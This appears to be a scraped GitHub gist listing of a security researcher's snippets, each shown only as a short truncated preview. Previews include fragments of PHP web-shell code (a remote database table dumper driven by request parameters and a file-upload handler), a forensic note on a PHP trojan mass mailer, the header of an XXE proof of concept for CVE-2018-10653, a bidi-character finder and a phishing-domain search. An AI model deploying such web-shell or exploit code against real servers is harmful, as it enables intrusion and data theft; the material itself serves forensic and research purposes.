This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
error_reporting(0); | |
if(isset($_GET['check'])) | |
{ | |
echo "pawet"; | |
} | |
if(isset($_REQUEST["v1"])) | |
{ | |
$link = mysql_connect($_REQUEST["v1"], $_REQUEST["v2"], $_REQUEST["v3"]); | |
$query = "SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema NOT IN ( 'information_schema', 'performance_schema', 'mysql' )"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
python-usb | |
python3-usb | |
mingw-w64 | |
isc-dhcp-server | |
bridge-utils | |
libdbus-1-dev | |
libdbus-glib-1-dev | |
python3-venv | |
dirbuster | |
cmake |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
The code below was found during a forensic investigation. It seems to be a mass mailer that is using the PHPMailer class to send mail | |
from compromised web hosting providers. | |
The "password" is 5307c392-ad5e-4909-adec-c9fd12572686, see below. | |
Investigation was made by Jonas Lejon <jonas.githubgist at- triop.se> | |
The signature for PHP.Trojan.Mailer-1 can only find the packed version of this file. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$self = $_SERVER['PHP_SELF']; | |
$docr = $_SERVER['DOCUMENT_ROOT']; | |
$sern = $_SERVER['SERVER_NAME']; | |
$tend = "</tr></form></table><br><br><br><br>"; | |
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];} | |
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];} | |
else {$ac = "upload";} | |
switch($ac) { | |
case "upload": |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#/bin/sh | |
# Usage instructions: sh find.sh php|tr '\n' '; ' | |
# Then copy and paste the output and execute it | |
ext=$1 | |
C="\u200E \u200F \u202A \u202B \u202C \u202D \u202E \u2066 \u2067 \u2068 \u2069 \u202C" | |
for a in $C; do echo find . -type f -name \"*.$ext\" -exec grep -H \$\'$a\' {} \\\; ; done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ zgrep ^postnord 2022-02-07-com.zone.gz|awk '{print $1}'|sort -u | |
postnord-22.com. | |
postnord-delivery.com. | |
postnord-dk-post.com. | |
postnord-dk.com. | |
postnord-epostal.com. | |
postnord-logistics.com. | |
postnord-nestle.com. | |
postnord-no.com. | |
postnord-norway.com. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// Fetches a temporary access_token Bearer | |
// Replace the client_secret and client_id below | |
$curl = curl_init(); | |
curl_setopt_array($curl, array( | |
CURLOPT_URL => 'https://api.wpsec.com/oauth/token', | |
CURLOPT_RETURNTRANSFER => true, | |
CURLOPT_ENCODING => '', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
## | |
## PoC test for the XXE security vulnerability CVE-2018-10653 in XenMobile Server 10.8 before RP2 and 10.7 before RP3 | |
## | |
## This PoC was written by Jonas Lejon 2019-11-28 <jonas.xenmobile@triop.se> https://triop.se | |
## Reported to Citrix 2017-10, patch released 2018-05 | |
## | |
import requests | |
import sys |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
define("DOMAIN", "test.se"); | |
define("MAILGUN_API", "XXX123"); // Mailgun Private API Key | |
function br2nl($string) { | |
return preg_replace('/\<br(\s*)?\/?\>/i', "\n", $string); | |
} | |
function mg_send($to, $subject, $message) { | |
$ch = curl_init(); |
NewerOlder